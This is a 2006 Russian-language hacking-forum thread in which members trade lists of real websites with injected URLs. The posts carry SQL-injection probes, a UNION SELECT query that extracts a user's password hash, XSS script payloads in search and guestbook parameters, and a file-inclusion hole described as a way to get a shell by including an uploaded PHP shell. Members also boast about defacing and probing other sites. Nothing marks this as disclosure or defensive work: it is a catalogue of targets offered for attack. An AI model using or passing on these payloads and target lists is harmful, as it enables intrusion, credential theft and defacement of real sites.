Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,185
    Reputations:
    430
    http://www.linkexplorer.ru/4/?link=70792'
     
    1 person likes this.
  2. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=INBOX&sortdir=1&lang='

    Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
     
    1 person likes this.
  3. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Бля да шо вы за народ уже мою почту дефейсите вообще наглёж =(
     
    _________________________
  4. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Вот нашел сайт с тестом типа
    (Хочешь узнать кое-что про себя? )
    ну я в ответы поставил.
    '><script>alert('HakNet')</script>
    проходит не фильтруетса..
    сайт http://www.mostinfo.net/hlam/test/
     
  5. pch

    pch Elder - Старейшина

    Joined:
    22 Oct 2005
    Messages:
    34
    Likes Received:
    41
    Reputations:
    15
    Нашёл сайт рекламного агенства hxxp://www.proreklamy.ru/. Между прочих услуг есть создание сайта от 500$ и до 1500$. "Ого", - подумал я и решил поискать sql в запросе hxxp://www.proreklamy.ru/?module=custompage&id=6. И что вы думаете? Скрипт инклудит страницу custompage.php без каких-либо проверок!!! Заливаем на народ шелл с расширением php и подставляем в урл - всё, у нас шелл!!! И так сделано большинство их сайтов за 500-1500 зелёных! Я уже молчу про strict'ы или хотя бы transitional - там НЕТ декларации вовсе!
    Вывод: главное - PR, а остальное - ничто!
     
  6. 3er0

    3er0 Banned

    Joined:
    31 Mar 2006
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -2
    __http://www.dunas.com.br/ing/main.php?inc=filo
    __http://www.rus-fish.ru/?pg=xxx
    __http://85.10.200.53/imat-uve.de/main.php?inc=%27

    __http://pad.chasesdream.com/orion/downloads.php?cat=1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20orion_users%20WHERE%20user_id=2/*
     
  7. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.kalina-shanson.com/smi/show.php?id=2'0
     
  8. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    327
    Likes Received:
    106
    Reputations:
    19
    XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ;) ):

    _http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rifice%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех :p ?!

    Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь:

    _http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice%2F%29%3C%2Fscript%3E&submit1=Search
     
  9. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
  10. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
  11. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.tvernews.ru/?newsid=116'29

    http://www.spidermania.ru/index.php?action=12&id=9'

    http://webchess.ru/index.php?module=gallery&file=disp_img&id_img=&stat=ok

    http://www.regens.ru/benefits/firms/entrench/

    http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb27748'5

    http://drakkar.good.ru/index.php?act=guest&news_position=-4'

    http://www.televek.ru/phones/SonyEricsson/934/&https:/sourceforge.net/projects/fma/&

    http://squash.com.ua/rus/news/?page=27&news_id=50'0

    http://karatedojo.uazone.net/printitem.php3?newsid=8'

    http://www.kcnti.ru/orgot/lookorg.php?id=8'

    http://www.vw-club.ru/anno/show_anno.php?id=366'

    http://www.algis.ru/main.php?f=21&n=10&id=18'0

    http://www.gerdabook.ru/vet/view.php?id=5017'2
     
  12. s1z3r

    s1z3r Elder - Старейшина

    Joined:
    23 May 2006
    Messages:
    46
    Likes Received:
    13
    Reputations:
    0
  13. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    ВНИМАТЕЛЬНО ЧИТАЕМ ПЕРВЫЙ ПОСТ!!! ССЫЛКИ ОСТАВЛЯТЬ ТОЛЬКО В ТАКОМ ФОРМАТЕ: _http://ваша ссылка
     
  14. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.extrovert.ru/?id=929

    http://www.multi-tech.ru/index.php?goto=gallery&showimage=34'

    http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=33400'

    http://www.astmui.ru/index.php?id=news_more&news_id=1'

    http://ukr-apartments.kiev.ua/apartment.php?PHPSESSID=0b113a9c73caf68cdc7d91becb27748'5

    http://mediapro.com.ua/news/text.php?id=47'3

    http://noclick.net.ru/nav.php

    http://www.gruzautoland.ru/auto/show.php?id=5'6

    http://www.comquest.ru/news/show_news.php?uid=2'3

    http://www.cato.ru/pages/151?idpage=148'

    http://www.kaz.kz/top/kom.php?id=1'

    http://forumy.ru/chumakov/view.php?dat=20031223133317_1&part=8'
     
  15. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    _www.faq-hack.ru

    Там лолки, а не админы. Стоит у них сниффер один в один с нашим, ачатовским. Злость пробрала - решил на баги проверить =). Сниффер первый под руку и попался. Там не фильтровалось имя браузера. Буквально 2 минуты на странице сниффера висел замкнутый цикл с алертом в предзноменование того, что я начал ковырять их сайт =).

    Теперь к багам... Долго не искал...лень стало...
    Нарыл пассивную xss(это в анонимном мэйлере):
    _http://faq-hack.ru/onlinesoft/mail/function.php?name=anyname&mymail=antmail&[email protected][XSS]&theme=anytheme

    Вторая бага - ошибка скул. Получить её можно, обратившись к снифферу и передав ему в http-заголовке имя браузера с одинарной кавычкой.
     
  16. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    _http://customize.ru/gbook/index.php?name="><h1>test1</h1>&mail="><h1>test2</h1>&city="><h1>test3</h1>&mess=anymessage&add=Отправить

    Сразу когда по ссыле пройдёте, нифуя не отобразиться. А вот страничку обновите и тогда xss-ки сработают. Просто все данные передаются в кукисы, а когда страницу обновляешь данные из кукисов подставляются в формочки.
     
  17. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.vdvsn.ru/forum/dialogue.phtml?id=276&forumName=10&page=1'

    http://www.v21v.ru/katalog/index.php?new_item=1'

    http://www.melodi.ru/index.php?p=1137482278&step=1'

    http://order.referats.info/content.php?wnum=390'8

    http://www.seneka.ru/index.php?section=портфолио

    http://www.popugay.com/news/printitem.php?newsid=5'
     
Thread Status:
Not open for further replies.